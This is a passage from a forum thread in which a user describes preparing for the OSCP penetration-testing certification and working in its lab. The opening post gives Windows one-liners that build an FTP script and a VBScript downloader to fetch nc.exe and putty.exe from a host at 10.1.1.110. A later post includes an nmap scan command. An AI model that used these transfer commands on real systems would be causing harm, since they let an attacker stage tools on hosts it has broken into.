    set r=^&echo:&&(echo open 10.1.1.110 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt
    or
    (for %t in ("open 10.1.1.110 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt

    Keep in mind that the Windows nc.exe tool has a limitation on the amount of data you can send per command. For instance, nc.exe will crash with the following one-liner because it is too long (it works in cmd.exe and other cli's, just not via nc.exe):

    (for %t in ("strUrl = WScript.Arguments.Item(0)" "StrFile = WScript.Arguments.Item(1)" "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" "Dim http,varByteArray,strData,strBuffer,lngCounter,fs, ts" "Err.Clear" "Set http = Nothing" "Set http = CreateObject("WinHttp.WinHttpRequest.5.1")" "If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")" "If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")" "If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")" "http.Open "GET",strURL,False" "http.Send" "varByteArray = http.ResponseBody" "Set http = Nothing" "Set fs = CreateObject("Scripting.FileSystemObject")" "Set ts = fs.CreateTextFile(StrFile,True)" "strData = """ "strBuffer = """ "For lngCounter = 0 to UBound(varByteArray)" "ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))" "Next" "ts.Close") do @echo %~t) >wget.vbs && cscript wget.vbs http://10.1.1.110/putty.exe putty.exe
    Last edited by JollyFrogs; 06-06-2015 at 12:51 AM.
    Reply With Quote Quote  

  21. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #20
    Nice write up so far. I'm sure you'll be able to pass the exam on the first pass.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  22. Member
    Join Date
    May 2015
    Posts
    79
    #21
    I signed up today! I enlisted with my work email, got an email on my work email with confirmation code, which I used to sign up. My account is being generated after which I will have to test out lab access. When this is confirmed, I will get the option to pay for the 90 days of labs and the exam. I'm really looking forward to starting the lab and I'm keen to see if my preparations will pay off. My goal is 100% of the lab machines owned.
    Reply With Quote Quote  

  23. Member
    Join Date
    May 2015
    Posts
    79
    #22
    I have completed my sign up for the Penetration Testing with Kali (the required course to sit the OSCP exam).
    The process is as follows:
    - Sign up via offensive-security.com website with a non-public email address
    - Get an email from them shortly after with a registration link
    - Use the link in the email to reserve a starting date for the labs
    - Receive an email shortly after (within a day or so) with VPN details to test the VPN connection for up to 48hrs and a payment link
    - After verifying the VPN connection works, pay for the course using the payment link (within 72 hours)
    - Wait until the starting day

    So I received my VPN details to test the connection. I tested the connectivity and decided to run a quick nmap scan and to my surprise I was connected to the real lab... and I had 48 hours of play time! I wasn't going to let that go to waste, although if I had to sign up again I probably would have signed up on a Thursday so I had the whole weekend to play. I have a full time job so I only had about 5 hours total in the labs, minus the time it took to set up the connection . So naturally, I decided to give it a go My scan revealed many boxes with a fair amount of open ports: This was going to be good! The OffSec people had specified in the email which host ranges to scan, and my IP address was in the 192.168.14.x range. They mentioned I should be able to ping the x.x.x.220 ip address of my range, depending on which of the lab ranges I ended up in (random). The range though, is a /23. I tried pinging 192.168.14.220 and couldn't ping it but when I tried 192.168.15.220 I saw ping replies.

    So out came nmap as per my methodology explained in my earlier post:
    nmap -Pn -F -sSU -T5 -oX /root/192.168.15.200-254.xml 192.168.15.200-254 | grep -v 'filtered|closed' > /root/quick_recon.txt

    This command took about 4 minutes to complete, and the open ports lit up like a Christmas tree. I didn't really have any idea or preference of which host to attack first, and seeing so many open ports on so many machines, I figured the simplest approach would be to start at the lowest IP and work my way up through the IP addresses.

    I started with the first IP address. After enumerating the host, I found a vulnerability I could exploit. I didn't want to use Metasploit for this because I would learn more doing things by hand first. I didn't start up my listener before I fired off my fumbled attempt to exploit and this resulted in a denial of service on the machine: I crashed it by accident and had no way to reset it. I didn't have a GUI panel available to reset hosts since I was only supposed to be testing the VPN connection .

    After this silly mistake I decided to change my attack methodology, mainly because I want to maximize my time in the labs and exploit every host: I will use Metasploit for mundane tasks like reverse shells, simple fire-and-forget exploits and uploading files through Meterpreter. After I complete the labs and if I still have time left, I will repeat the exploits by hand.

    I then moved on to the next host which I expect will require some form of brute-forcing. I was looking for something a little more meaty than building a word-list and running a brute force tool against a server so I proceeded to the next IP in the list. My next target was called Bob, and I had a great time breaking into Bob. I went to bed 2 hours later than I had planned to, I just couldn't get myself to go to bed knowing I could solve this puzzle. My persistence paid off, and after about 3 hours of puzzling and taking notes and screenshots, Bob was mine.. and it felt great! I looted the box, left behind the digital equivalent of graffiti (a "Jollyfrogs.txt" file with some words of wisdom) and logged off from the VPN, tired but extremely satisfied.

    Being the first host I exploited to system/root level, it certainly will be a name I will remember. I didn't have time to look at other hosts but Bob made me realize that my generic approach works which is a relief.

    My exam starts Sunday the 21st of June (next week) and I'm excited to start!
    Reply With Quote Quote  

  24. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #23
    Good thread so far. Keep it up!
    How much time did you sign up for?
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  25. Member
    Join Date
    May 2015
    Posts
    79
    #24
    Quote Originally Posted by MrAgent View Post
    Good thread so far. Keep it up!
    How much time did you sign up for?
    Hi MrAgent, I signed up for 90 days.
    Reply With Quote Quote  

  26. Stayed at a Holiday Inn.. the_Grinch's Avatar
    Join Date
    May 2007
    Posts
    3,826

    Certifications
    BS-CST CISSP GMON MPSC Security+ XRY 1+2+3 XAMN AAA AA
    #25
    Awesome posts! Let me just commend you on all the work you have done prior to signing up. What's your background?
    WIP:
    MS in Legal Studies - Drexel University
    Mobile Forensics
    Kotlin
    Python
    Reply With Quote Quote  

+ Reply to Thread
Page 1 of 5 1 2345 Last

Social Networking & Bookmarks